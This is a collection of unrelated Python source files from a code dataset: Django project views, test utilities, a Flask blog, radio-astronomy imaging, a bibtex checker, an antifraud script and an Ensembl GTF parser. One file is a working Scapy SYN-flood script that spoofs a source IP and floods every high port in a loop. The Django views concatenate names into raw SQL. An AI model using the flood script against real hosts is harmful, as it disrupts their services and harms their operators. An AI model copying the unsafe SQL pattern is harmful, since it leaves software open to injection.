'controlled' in column and column['controlled'] is not None:\n controlled = column['controlled']['key']\n shared_id = \"CLIN:\" + controlled # All shared IDs at the moment are clinical TCGA\n else:\n controlled = filter_column_name(column['name'])\n\n fileJSON['COLUMNS'].append({\n \"NAME\" : column['name'],\n \"TYPE\" : type,\n \"INDEX\" : column['index'],\n \"MAP_TO\" : controlled,\n \"SHARED_ID\" : shared_id\n })\n\n all_columns.append({\n \"name\": column['name'],\n \"type\": type\n })\n\n config['FILES'].append(fileJSON)\n\n # Skip *_samples table for low level data\n create_metadata_tables(request.user, study, all_columns, request.POST['data-type'] == 'low')\n\n dataset = request.user.user_data_tables_set.create(\n study=study,\n metadata_data_table=config['USER_METADATA_TABLES']['METADATA_DATA'],\n metadata_samples_table=config['USER_METADATA_TABLES']['METADATA_SAMPLES'],\n data_upload=upload,\n google_project=request.user.googleproject,\n google_bucket=request.user.bucket_set.all()[0]\n )\n\n if settings.PROCESSING_ENABLED:\n files = {'config.json': ('config.json', json.dumps(config))}\n post_args = {\n 'project_id':proj.id,\n 'study_id':study.id,\n 'dataset_id':dataset.id\n }\n success_url = reverse('study_data_success', kwargs=post_args) + '?key=' + upload.key\n failure_url = reverse('study_data_error', kwargs=post_args) + '?key=' + upload.key\n parameters = {\n 'SUCCESS_POST_URL': request.build_absolute_uri( success_url ),\n 'FAILURE_POST_URL': request.build_absolute_uri( failure_url )\n }\n r = requests.post(settings.PROCESSING_JENKINS_URL + '/job/' + settings.PROCESSING_JENKINS_PROJECT + '/buildWithParameters',\n files=files, params=parameters,\n auth=(settings.PROCESSING_JENKINS_USER, settings.PROCESSING_JENKINS_PASSWORD))\n\n if r.status_code < 400:\n upload.status = 'Processing'\n upload.jobURL = r.headers['Location']\n else:\n upload.status = 'Error Initializing'\n\n upload.save()\n\n resp = {\n 'status': status,\n 'message': message\n }\n if status is \"success\":\n resp['redirect_url'] = '/projects/' + str(proj.id) + '/'\n\n return JsonResponse(resp)\n\n@login_required\ndef project_delete(request, project_id=0):\n proj = request.user.project_set.get(id=project_id)\n proj.active = False\n proj.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\n@login_required\ndef project_edit(request, project_id=0):\n name = request.POST['name']\n description = request.POST['description']\n\n if not name:\n raise Exception(\"Projects cannot have an empty name\")\n\n proj = request.user.project_set.get(id=project_id)\n proj.name = name\n proj.description = description\n proj.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\n@login_required\ndef project_share(request, project_id=0):\n proj = request.user.project_set.get(id=project_id)\n emails = re.split('\\s*,\\s*', request.POST['share_users'].strip())\n\n create_share(request, proj, emails, 'Project')\n\n return JsonResponse({\n 'status': 'success'\n })\n\n@login_required\ndef study_delete(request, project_id=0, study_id=0):\n proj = request.user.project_set.get(id=project_id)\n study = proj.study_set.get(id=study_id)\n study.active = False\n study.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\n@login_required\ndef study_edit(request, project_id=0, study_id=0):\n name = request.POST['name']\n description = request.POST['description']\n\n if not name:\n raise Exception(\"Projects cannot have an empty name\")\n\n proj = request.user.project_set.get(id=project_id)\n study = proj.study_set.get(id=study_id)\n study.name = name\n study.description = description\n study.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\ndef study_data_success(request, project_id=0, study_id=0, dataset_id=0):\n proj = Project.objects.get(id=project_id)\n study = proj.study_set.get(id=study_id)\n datatables = study.user_data_tables_set.get(id=dataset_id)\n\n if not datatables.data_upload.key == request.GET.get('key'):\n raise Exception(\"Invalid data key when marking data success\")\n\n ufds = User_Feature_Definitions.objects.filter(study_id=study.id)\n cursor = connection.cursor()\n\n for user_feature in ufds:\n if ' ' in user_feature.feature_name:\n # Molecular data will not be column names but rather names of features\n continue\n col_name = filter_column_name(user_feature.feature_name)\n\n cursor.execute('SELECT COUNT(1) AS \"count\", '+ col_name +' AS \"val\" FROM ' + datatables.metadata_samples_table)\n values = cursor.fetchall()\n\n for value in values:\n ufc = User_Feature_Counts.objects.create(feature=user_feature, value=value[1], count=value[0])\n ufc.save()\n\n cursor.close()\n\n datatables.data_upload.status = 'Complete'\n datatables.data_upload.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\ndef study_data_error(request, project_id=0, study_id=0, dataset_id=0):\n proj = Project.objects.get(id=project_id)\n study = proj.study_set.get(id=study_id)\n datatables = study.user_data_tables_set.get(id=dataset_id)\n\n if not datatables.data_upload.key == request.GET.get('key'):\n raise Exception(\"Invalid data key when marking data success\")\n\n datatables.data_upload.status = 'Error'\n datatables.data_upload.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n","sub_path":"projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"59545443","text":"#########\n# Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport os\n\nfrom mock import patch\nfrom nose.plugins.attrib import attr\n\nfrom manager_rest import models\nfrom manager_rest.utils import read_json_file, write_dict_to_json_file\nfrom manager_rest.utils import plugin_installable_on_current_platform\nfrom manager_rest.test import base_test\n\n\n@attr(client_min_version=1, client_max_version=base_test.LATEST_API_VERSION)\nclass TestUtils(base_test.BaseServerTestCase):\n\n def test_read_write_json_file(self):\n test_dict = {'test': 1, 'dict': 2}\n tmp_file_path = os.path.join(self.tmpdir, 'tmp_dict.json')\n write_dict_to_json_file(tmp_file_path, test_dict)\n read_dict = read_json_file(tmp_file_path)\n self.assertEqual(test_dict, read_dict)\n\n test_dict = {'test': 3, 'new': 2}\n write_dict_to_json_file(tmp_file_path, test_dict)\n read_dict = read_json_file(tmp_file_path)\n self.assertEqual(3, read_dict['test'])\n self.assertEqual(test_dict, read_dict)\n\n @attr(client_min_version=2,\n client_max_version=base_test.LATEST_API_VERSION)\n def test_plugin_installable_on_current_platform(self):\n def create_plugin(supported_platform=None,\n distribution=None,\n distribution_release=None):\n mock_data = {k: 'stub' for k in models.Plugin.fields}\n if supported_platform:\n mock_data['supported_platform'] = supported_platform\n if distribution:\n mock_data['distribution'] = distribution\n if distribution_release:\n mock_data['distribution_release'] = distribution_release\n return models.Plugin(**mock_data)\n\n plugin = create_plugin()\n self.assertFalse(plugin_installable_on_current_platform(plugin))\n\n plugin = create_plugin(supported_platform='any')\n self.assertTrue(plugin_installable_on_current_platform(plugin))\n\n platform = 'platform1'\n dist = 'dist1'\n rel = 'rel1'\n\n def mock_linux_dist(full_distribution_name):\n return dist, '', rel\n\n def mock_get_platform():\n return platform\n\n with patch('platform.linux_distribution', mock_linux_dist):\n with patch('wagon.utils.get_platform', mock_get_platform):\n plugin = create_plugin(supported_platform=platform)\n self.assertFalse(\n plugin_installable_on_current_platform(plugin))\n\n plugin = create_plugin(distribution=dist,\n distribution_release=rel)\n self.assertFalse(\n plugin_installable_on_current_platform(plugin))\n\n plugin = create_plugin(supported_platform=platform,\n distribution=dist,\n distribution_release=rel)\n self.assertTrue(\n plugin_installable_on_current_platform(plugin))\n","sub_path":"rest-service/manager_rest/test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529474381","text":"from math import ceil\nfrom flask import render_template, request\nfrom sqlalchemy import desc\nfrom app import app, db\nfrom app.database import Post, Category, Keyword\nfrom app.helpers import urlize, unurlize\n\n@app.route('/')\ndef index():\n stories = Post.query.order_by(desc(Post.date)).limit(5).all()\n return render_template('index.html', stories=stories)\n\n@app.route('/blog/', defaults={'path': ''})\n@app.route('/blog/')\ndef blog(path):\n parts = path.rstrip('/').split('/')\n if len(parts) == 1:\n parts = []\n\n if len(parts) % 2 != 0:\n return redirect(url_for('blog'))\n \n elif len(parts) == 2 and parts[0] == 'post':\n p = Post.query.filter(Post.slug == parts[1]).first()\n return render_template('blog.html', posts=[p])\n\n else:\n query = Post.query\n for i in range(0, len(parts), 2):\n field, val = parts[i], parts[i+1]\n if field == 'category':\n query = query.filter(Post.category.has(Category.name \\\n == unurlize(val)))\n elif field == 'keyword':\n query = query.filter(Post.keywords.contains(unurlize(val)))\n elif field == 'postid':\n query = query.filter(Post.id == val)\n\n num_pages = ceil(Post.query.count() / 4)\n\n if 'page' in request.args:\n cur_page = int(request.args['page'])\n else:\n cur_page = 1\n\n\n query = query.order_by(desc(Post.date))\n\n query = query.offset(3 * (cur_page-1)).limit(3)\n\n posts = query.all()\n\n return render_template('blog.html', posts=posts, \n cur_page=cur_page, num_pages=num_pages)\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552162931","text":"\"\"\"\nContinuum imaging scripts. There must be a ``continuum_mses.txt`` file in the\ndirectory this is run in. That file is produced by ``split_windows.py``.\n\nYou can set the following environmental variables for this script:\n EXCLUDE_7M=\n If this parameter is set (to anything), the 7m data will not be\n included in the images if they are present.\n\"\"\"\n\nimport os\nfrom tasks import tclean, exportfits, plotms\nfrom taskinit import msmdtool\nmsmd = msmdtool()\n\nimaging_root = \"imaging_results\"\nif not os.path.exists(imaging_root):\n os.mkdir(imaging_root)\n\nwith open('continuum_mses.txt', 'r') as fh:\n continuum_mses = [x.strip() for x in fh.readlines()]\n\nfor continuum_ms in continuum_mses:\n\n # strip off .cal.ms\n basename = os.path.split(continuum_ms[:-7])[1]\n\n field = basename.split(\"_\")[0]\n\n if os.getenv('EXCLUDE_7M'):\n msmd.open(continuum_ms)\n antennae = \",\".join([x for x in msmd.antennanames() if 'CM' not in x])\n msmd.close()\n suffix = '12M'\n else:\n antennae = \"\"\n suffix = '7M12M'\n\n\n contimagename = os.path.join(imaging_root, basename) + \"_\" + suffix\n\n # make a diagnostic plot to show the UV distribution\n plotms(vis=continuum_ms,\n xaxis='uvwave',\n yaxis='amp',\n avgchannel=1000, # minimum possible # of channels\n plotfile=contimagename+\".uvwave_vs_amp.png\",\n showlegend=True,\n showgui=False,\n antenna=antennae,\n )\n\n imsize = [3000,3000]\n cellsize = ['0.05arcsec', '0.05arcsec']\n\n for robust in (-2, 0, 2):\n imname = contimagename+\"_robust{0}\".format(robust)\n\n if not os.path.exists(imname+\".image.tt0\"):\n tclean(vis=continuum_ms,\n field=field.encode(),\n imagename=imname,\n gridder='mosaic',\n specmode='mfs',\n deconvolver='mtmfs',\n scales=[0,3,9,27,81],\n nterms=2,\n outframe='LSRK',\n veltype='radio',\n niter=10000,\n usemask='auto-multithresh',\n interactive=False,\n cell=cellsize,\n imsize=imsize,\n weighting='briggs',\n robust=robust,\n pbcor=True,\n antenna=antennae,\n )\n\n exportfits(imname+\".image.tt0\", imname+\".image.tt0.fits\")\n exportfits(imname+\".image.tt0.pbcor\", imname+\".image.tt0.pbcor.fits\")\n","sub_path":"reduction/continuum_imaging.py","file_name":"continuum_imaging.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621597569","text":"from __future__ import print_function, absolute_import\nimport os\nimport sys\nfrom argparse import ArgumentParser\nPY2 = sys.version_info[0] == 2\nif PY2:\n from codecs import open\n\nfrom . import bib\nfrom . import schemas\n\n\ndef parse_cmd_line():\n def bibtexfilename(fn):\n if not fn.endswith('.bib'):\n raise ValueError('bibtex filename must end in .bib')\n return fn\n\n argparser = ArgumentParser(description=\"\"\"\n Validator for bibtex files\n \"\"\")\n argparser.add_argument('bibtex', type=bibtexfilename)\n argparser.add_argument('-v', '--verbose', action='store_true')\n argparser.add_argument('--schema', default='ACS', help='The schema specifies which bibtex fields are required for a particular journal. Default=\"ACS\"', choices=['ACS'])\n\n args = argparser.parse_args()\n # print args\n return args\n\ndef main():\n args = parse_cmd_line()\n with open(args.bibtex, 'r', encoding='utf-8') as f:\n lines = os.linesep.join(l.strip() for l in f)\n\n bibobject = bib.Bibparser(lines, verbose=args.verbose)\n bibobject.parse()\n\n schema = getattr(schemas, args.schema)\n bibobject.validate(schema)\n","sub_path":"bibcheck/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"449190662","text":"import sys\n\nusers={}\n\nbatch = open(sys.argv[1],'r')\n\nlines = batch.readlines()\n\nfor line in lines[1:]:\n elements = line.split(\", \")\n user1 = elements[1]\n user2 = elements[2]\n if user1 in users:\n if user2 not in users[user1]:\n users[user1].append(user2)\n else:\n users[user1]=[user2]\n if user2 in users:\n if user1 not in users[user2]:\n users[user2].append(user1)\n else:\n users[user2]=[user1]\n\n\ndef searchFriends(source, target, track, degree, limit):\n if source not in users:\n return False\n if target in users[source]:\n return True\n elif degree < limit:\n track.append(source)\n for user in users[source]:\n if user not in track:\n if searchFriends(user, target, track, degree+1, limit):\n return True\n return False\n else:\n return False\n\n\nstream = open(sys.argv[2],'r')\n\noutput1 = open(sys.argv[3],'w')\noutput2 = open(sys.argv[4],'w')\noutput3 = open(sys.argv[5],'w')\n\ntranses = stream.readlines()\n\nfor trans in transes[1:]:\n fields = trans.split(\", \")\n id1 = fields[1]\n id2 = fields[2]\n if searchFriends(id1, id2, [], 1, 1):\n output1.write(\"trusted\\n\")\n else:\n output1.write(\"unverified\\n\")\n if searchFriends(id1, id2, [], 1, 2):\n output2.write(\"trusted\\n\")\n else:\n output2.write(\"unverified\\n\")\n if searchFriends(id1, id2, [], 1, 4):\n output3.write(\"trusted\\n\")\n else:\n output3.write(\"unverified\\n\")\n\n\n\n\n\n","sub_path":"insight_testsuite/temp/src/antifraud.py","file_name":"antifraud.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235971049","text":"#!/usr/bin/env python\nfrom scapy.all import *\nfrom scapy.layers.inet import IP, TCP\n\n\ndef syn_flood(src, tgt, msg):\n for d_port in range(1024, 65535):\n ip_layer = IP(src=src, dst=tgt)\n tcp_player = TCP(sport=4444, dport=d_port)\n raw_layer_ = Raw(load=msg)\n pkt = ip_layer / tcp_player / raw_layer_\n send(pkt)\n\n\ndef main():\n source = raw_input(\"[*] Enter Source IP Address to Fake: \")\n target = raw_input(\"[*] Enter Target's IP Address: \")\n message = raw_input(\"[*] Enter the Message for TCP Payload: \")\n while True:\n syn_flood(source, target, message)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n exit(0)\n","sub_path":"python/Master-Ethical-Hacking-With-Python/local_networking/synflood.py","file_name":"synflood.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500965468","text":"#!/usr/bin/env python\n##############################################################################\n### To use the functions in this lib simply import this python module using\n### import ensemblUtils\n### Then you'll able able to call functions with the proper arguments using\n### returnVal=ensemblUtils.func1(arg1,arg2)\n##############################################################################\n##############################################################################\nimport sys\nimport os\n\n##############################################################\n# Genomedata is off by one, seq[0] returns you the 1st bp. \n# Have to account for this by subtracting one from each seq coordinate\n# before retrieving sequence from Genomedata.\n# installation: pip install genomedata --user\nfrom genomedata import Genome\n##############################################################\n\nimport string\nimport math\nimport gzip\nimport _pickle as pickle\nimport numpy as np\n\ncomplement = str.maketrans('atcgn', 'tagcn')\n\ndef parse_ensembl_geneAndProtein_pairings(infilename,proteinToGeneDic,proteinPairsDic):\n\t\"\"\"\n\tThis function parses a given Ensembl file downloaded from below folders\n\tand parses out the gene and protein pairings. \n\tFor the first files, say org1 to org2, it only reports protein pairings.\n\tFor the second file it reports back the protein and gene pairings using\n\tthe protein pairings from the first proteinPairingsSoFar dictionary.\n\tFields of these files are (as far as I understand):\n\t\tsomeScore chr\tnotsure\tstart end orthologytype\n\t\n\t\t0.14740\tMT\t192515\t3307\t4262\tortholog_one2one\t73.39810\tEuarchontoglires\t77\t\n\t\tENSG00000198888\tENSP00000354687\tENSMUSP00000080991\t77\t0\n\n\t\"\"\"\n\tsys.stderr.write(\"Parsing gene and protein pairings from file \"+infilename+\"\\n\")\n\n\tisFirstFile=True\n\tif bool(proteinToGeneDic): # empty dic evaluates to False\n\t\tisFirstFile=False\n\n\tgenePairsDic={}\n\tif infilename.endswith(\".gz\"):\n\t\tinfile=gzip.open(infilename,'rb')\n\telse:\n\t\tinfile=open(infilename,'r')\n\t#\n\n\t# it doesn't have a header\n\tlineCount=0\n\tfor line in infile:\n\t\twords=line.rstrip().split()\n\t\tsomeScore,chr,notsure,st,en,orthologyType,someOtherScore,phylo,\\\n\t\t\tgene1PercentIdentity,gene1,protein1,protein2,genename,gene2PercentIdentity,notsure=words ## genename variable added\n\t\t\n\t\t# skip the chromosomes that are not 1..23 or X or Y\n\t\tif chr==\"MT\" or len(chr)>2: \n\t\t\tcontinue\n\t\t\n\t\tif \"ortholog\" not in orthologyType:\n\t\t\tcontinue\n\n\t\tproteinToGeneDic[protein1]=gene1\n\t\tif protein1 not in proteinPairsDic:\n\t\t\tproteinPairsDic[protein1]=[]\n\t\tproteinPairsDic[protein1].append(protein2)\n\n\t\tif not isFirstFile:\n\t\t\tif protein2 not in proteinToGeneDic: # second gene is not from a 1,22 or X,Y chr\n\t\t\t\t#print [chr,gene1,protein1,protein2]\n\t\t\t\tcontinue \n\t\t\tgene2=proteinToGeneDic[protein2]\n\t\t\t# below checks ensure I only get one entry per g1-g2 pair\n\t\t\tif gene1 not in genePairsDic:\n\t\t\t\tgenePairsDic[gene1]=[]\n\t\t\t\tgenePairsDic[gene1].append([gene2,orthologyType,gene1PercentIdentity,gene2PercentIdentity])\n\t\t\telse: \n\t\t\t\tif gene2 not in [a[0] for a in genePairsDic[gene1]]:\n\t\t\t\t\tgenePairsDic[gene1].append([gene2,orthologyType,gene1PercentIdentity,gene2PercentIdentity])\n\t\t\t#\n\t#\n\ttypes={}\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tnum=len(genePairsDic[g1])\n\t\tif type==\"ortholog_one2one\" and num>1:\n\t\t\tsys.exit(\"Matching should be one2one but it isn't\\t\"+g1)\n\t\tif type not in types:\n\t\t\ttypes[type]=0\n\t\ttypes[type]+=1\n\t#\n\tinfile.close()\n\t\n\tsys.stderr.write(\"Gene pair mappings summary: \"+repr(types)+\"\\n\\n\")\n\n\treturn proteinToGeneDic,genePairsDic,proteinPairsDic\n\ndef parse_ensembl_gene_pairings(infilename):\n\t\"\"\"\n\tThis function parses a given Ensembl file (comma seperated) \n\tthat matches the genes of the first organism to the second.\n\t\"\"\"\n\tsys.stderr.write(\"Parsing gene pairings from file \"+infilename+\"\\n\")\n\n\tgenePairsDic={}\n\tif infilename.endswith(\".gz\"):\n\t\tinfile=gzip.open(infilename,'rb')\n\telse:\n\t\tinfile=open(infilename,'r')\n\t#\n\t#########################################################################\n\t## Commented by Abhijit \n\t## The file header is changed so the following section needs to be recoded\n\t##\n\t##columnIndices={\"GeneID1\" : -1, \"GeneID2\" : -1, \"Homology Type\" : -1, \"Orthology confidence\": -1, \"Percent Identity\" : -1, \"Chromosome Name\" : []}\n\t## parse the information header first\n\t##columnNames=infile.readline().strip().split(\",\")\n\t##i=0 #0-based column indices\n\t##for c in columnNames:\n\t##\tif c==\"Ensembl Gene ID\":\n\t##\t\tcolumnIndices[\"GeneID1\"]=i\n\t##\telif c.endswith(\"Ensembl Gene ID\"):\n\t##\t\tcolumnIndices[\"GeneID2\"]=i\n\t##\telif c==\"Homology Type\":\n\t##\t\tcolumnIndices[\"Homology Type\"]=i\n\t##\telif \"Orthology confidence\" in c:\n\t##\t\tcolumnIndices[\"Orthology confidence\"]=i\n\t##\telif c.endswith(\"Identity with respect to query gene\"):\n\t##\t\tcolumnIndices[\"Percent Identity\"]=i\n\t##\telif c.endswith(\"Chromosome Name\"):\n\t##\t\tcolumnIndices[\"Chromosome Name\"].append(i)\n\t##\ti+=1\n\t#########################################################################\n\n\t######## Rewritten ########\n\tcolumnIndices={\"GeneID1\" : -1, \"GeneID2\" : -1, \"Homology Type\" : -1, \"Orthology confidence\": -1, \"Percent Identity\" : -1, \"Chromosome Name1\" : -1, \"Chromosome Name2\" : -1}\n\t## parse the information header first\n\tcolumnNames=infile.readline().strip().split(\",\")\n\ti=0 #0-based column indices\n\tfor c in columnNames:\n\t\tif c==\"GeneID1\":\n\t\t\tcolumnIndices[\"GeneID1\"]=i\n\t\telif c==\"GeneID2\":\n\t\t\tcolumnIndices[\"GeneID2\"]=i\n\t\telif c==\"Homology Type\":\n\t\t\tcolumnIndices[\"Homology Type\"]=i\n\t\telif c==\"Orthology confidence\":\n\t\t\tcolumnIndices[\"Orthology confidence\"]=i\n\t\telif c==\"Percent Identity\":\n\t\t\tcolumnIndices[\"Percent Identity\"]=i\n\t\telif c==\"Chromosome Name1\":\n\t\t\tcolumnIndices[\"Chromosome Name1\"]=i\n\t\telif c==\"Chromosome Name2\":\n\t\t\tcolumnIndices[\"Chromosome Name2\"]=i\n\t\ti+=1\n\t#\n\tlineCount=0\n\tfor line in infile:\n\t\twords=line.rstrip().split(\",\")\n\t\t# skip the chromosomes that are not 1..23 or X or Y\n\t\t##ch1,ch2 = words[columnIndices[\"Chromosome Name\"][0]],words[columnIndices[\"Chromosome Name\"][1]]\n\t\tch1,ch2 = words[columnIndices[\"Chromosome Name1\"]],words[columnIndices[\"Chromosome Name2\"]]\n\t\tif ch1==\"MT\" or len(ch1)>2 or ch2==\"MT\" or len(ch2)>2:\n\t\t\tcontinue\n\t\t#\n\t\tgene1,gene2= words[columnIndices[\"GeneID1\"]], words[columnIndices[\"GeneID2\"]]\n\t\thomologyType= words[columnIndices[\"Homology Type\"]]\n\t\torthologyConfidence=words[columnIndices[\"Orthology confidence\"]]\n\t\tpercentIdentity=words[columnIndices[\"Percent Identity\"]]\n\t\t# below checks ensure I only get one entry per g1-g2 pair\n\t\tif gene1 not in genePairsDic:\n\t\t\tgenePairsDic[gene1]=[]\n\t\t\tgenePairsDic[gene1].append([gene2,homologyType,orthologyConfidence,percentIdentity])\n\t\telse: \n\t\t\tif gene2 not in [a[0] for a in genePairsDic[gene1]]:\n\t\t\t\tgenePairsDic[gene1].append([gene2,homologyType,orthologyConfidence,percentIdentity])\n\t\t\t#\n\t\t#\n\t\tlineCount+=1\n\t#\n\t#print len(genePairsDic)\n\ttypes={}\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1] \n\t\tnum=len(genePairsDic[g1])\n\t\tif type==\"ortholog_one2one\" and num>1:\n\t\t\tsys.exit(\"Matching should be one2one but it isn't\\t\"+g1)\n\t\tif type not in types:\n\t\t\ttypes[type]=0\n\t\ttypes[type]+=1\n\t#\n\tinfile.close()\n\t\n\tsys.stderr.write(\"Gene pair mappings summary: \"+repr(types)+\"\\n\\n\")\n\n\treturn genePairsDic\n\n\ndef parse_organism_GTF(orgID, infilename, outdir):\n\t\"\"\"\n\tThis function parses a given Ensembl GTF file into the \n\tinternal data structure for that organism. \n\tDoes not output anything if outdir is \"None\"\n\t\"\"\"\n\tsys.stderr.write(\"Parsing organism GTF for \"+orgID+\" from file \"+infilename+\"\\n\")\n\tgeneDic={}\n\ttranscriptDic={}\n\texonDic={}\n\tinfoDic={} # build, version, accession\n\tif infilename.endswith(\".gz\"):\n\t\tinfile=gzip.open(infilename,'rb')\n\telse:\n\t\tinfile=open(infilename,'r')\n\t# parse the information header first\n\telemCounts={\"CDS\" : 0, \"exon\" : 0, \"gene\" : 0, \"start_codon\" : 0, \n\t\t\"stop_codon\" : 0, \"transcript\" : 0, \"UTR\" : 0, \"other\" : 0}\n\tlineCount=0\n\tlastReadExon=\"dummy\"\n\tfor line in infile:\n\t\tif line.startswith(\"#\"):\n\t\t\tkey, item = line.split()[:2]\n\t\t\tinfoDic[key.split(\"-\")[-1]]=item\n\t\telse:\n\t\t\telemType=line.rstrip().split(\"\\t\")[2]\n\t\t\tchrName=line.rstrip().split(\"\\t\")[0]\n\t\t\tif chrName==\"MT\" or len(chrName)>2:\n\t\t\t\t#print chrName\n\t\t\t\tcontinue\n\t\t\tif elemType==\"gene\":\n\t\t\t\tnewGene=EnsemblGene(line)\n\t\t\t\tgeneDic[newGene.basicInfoDic[\"gene_id\"]]=newGene\n\t\t\telif elemType==\"transcript\":\n\t\t\t\tnewTranscript=EnsemblTranscript(line)\n\t\t\t\ttranscriptDic[newTranscript.basicInfoDic[\"transcript_id\"]]=newTranscript\n\t\t\t\tgeneId=newTranscript.basicInfoDic[\"gene_id\"]\n\t\t\t\tgeneDic[geneId].add_transcript(newTranscript)\n\t\t\telif elemType==\"exon\":\n\t\t\t\tnewExon=EnsemblExon(line)\n\t\t\t\tlastReadExon=newExon.basicInfoDic[\"exon_id\"]\n\t\t\t\t\n\t\t\t\t# DELETEME!!\n\t\t\t\t#print(\"ALL_EXON_ENTRY\\t%s\\n\" % (newExon.get_summary_string())),\n\n\t\t\t\t# Make sure to store certain information about the exon if it appears multiple times\n\t\t\t\tif lastReadExon not in exonDic:\n\t\t\t\t\texonDic[lastReadExon]=newExon\n\t\t\t\telse:\n\t\t\t\t\t# DELETEME!!\n\t\t\t\t\t#print(\"DUPLICATE_EXON_ENTRY\\t%s\\t%s\\n\" % (exonDic[lastReadExon].get_summary_string(),newExon.get_summary_string())),\n\t\t\t\t\texonDic[lastReadExon].add_another_instance(newExon)\n\t\t\t\t#\n\t\t\t\tgeneId=newExon.basicInfoDic[\"gene_id\"]\n\t\t\t\ttranscriptId=newExon.basicInfoDic[\"transcript_id\"]\n\t\t\t\t## Add the exon to a gene, don't care about ordering and simply owerwrite if exists\n\t\t\t\tgeneDic[geneId].add_exon(newExon)\n\t\t\t\t## Add to exon to a transcript, make sure this exon insertion is ordered\n\t\t\t\t## Luckily entrys come ordered!\n\t\t\t\t## also same exon doesn't appear twice in once transcript so that case is not handled\n\t\t\t\ttranscriptDic[transcriptId].add_exon(newExon)\n\t\t\t\t## no need for below line because Python is Pass-by-object-reference\n\t\t\t\t#geneDic[geneId].transcripts[transcriptId].add_exon(newExon)\n\t\t\telif elemType==\"CDS\":\n\t\t\t\t#meaning previously read exon is completely/partially coding\n\t\t\t\tnewLocus=EnsemblLocus(line)\n\t\t\t\ttranscriptDic[transcriptId].handle_CDS(newLocus)\n\t\t\t\texonDic[lastReadExon].handle_CDS(newLocus)\n\t\t\t\t# DELETEME!!\n\t\t\t\t#print \"handleCDS\\t%s\\t%s\\n\" % (lastReadExon,newLocus.get_summary_string()),\n\t\t\telif elemType==\"UTR\" or elemType==\"stop_codon\" or elemType==\"start_codon\":\n\t\t\t\tnewLocus=EnsemblLocus(line)\n\t\t\t\ttranscriptDic[transcriptId].add_locus(newLocus,elemType)\n\t\t\t#\n\t\t\tif elemType not in elemCounts:\n\t\t\t\telemType=\"other\"\n\t\t\telemCounts[elemType]=elemCounts[elemType]+1\n\t\t\tlineCount+=1\n\t\t\tif lineCount%100000==0:\n\t\t\t\tsys.stderr.write(str(lineCount)+\"\\t\")\n\t\t#\n\t#\n\tsys.stderr.write(\"\\n\")\n\tsys.stderr.write(\"GTF parsing summary: \" +repr(elemCounts)+\"\\n\\n\")\n\tinfile.close()\n\tif outdir!=\"None\":\n\t\tprint_some_summary(orgID, geneDic,transcriptDic,exonDic,elemCounts, outdir)\n\treturn (geneDic,transcriptDic,exonDic,infoDic)\n\n\ndef print_some_summary(orgID, geneDic,transcriptDic,exonDic,elemCounts, outdir):\n\t\"\"\"\n\tPrint a summary for the genes, transcripts and exons in the\n\tread GTF file.\n\t\"\"\"\n\toutfile=open(outdir+\"/\"+orgID+\"-allGenes-GTFparsed.txt\",'w')\n\toutfile.write(\"chrName\\tstartCoord\\tendCoord\\tstrand\\tgeneID\\tgeneName\\tgeneType\\tnoOfTranscripts\\tnoOfExons\\telementType\\n\")\n\tfor g in geneDic:\n\t\toutfile.write(geneDic[g].get_summary_string()+\"\\n\")\n\t\t#print geneDic[g].get_summary_string()\n\t#\n\toutfile.close()\n\n\ttotalNumberOfExons=0\n\toutfile=open(outdir+\"/\"+orgID+\"-allTranscripts-GTFparsed.txt\",'w')\n\toutfile.write(\"chrName\\tstartCoord\\tendCoord\\tstrand\\ttranscriptID\\ttranscriptName\\ttranscriptType\\tgeneID\\tgeneName\\texonIDs\\texonTypes\\texonStarts\\texonEnds\\tcodingStarts\\tcodingEnds\\tstartCodon\\tstopCodon\\tUTRstarts\\tUTRends\\tproteinID\\telementType\\n\")\n\tfor t in transcriptDic:\n\t\toutfile.write(transcriptDic[t].get_summary_string()+\"\\n\")\n\t\ttotalNumberOfExons+=len(transcriptDic[t].exon_types)\n\t\t#print transcriptDic[t].get_summary_string()\n\t#\n\toutfile.close()\n#\tprint [\"totalNumberOfExons\", totalNumberOfExons]\n\n\toutfile=open(outdir+\"/\"+orgID+\"-allExons-GTFparsed.txt\",'w')\n\toutfile.write(\"chrName\\tstartCoord\\tendCoord\\tstrand\\texonID\\texonType\\tcodingStart\\tcodingEnd\\ttranscriptIDs\\texonNumbers\\tgeneID\\texonLength\\tacceptor2bp\\tdonor2bp\\tavgCodingConsScore\\tavgConsScore\\tfirstMidLastCounts\\telementType\\n\")\n\tfor e in 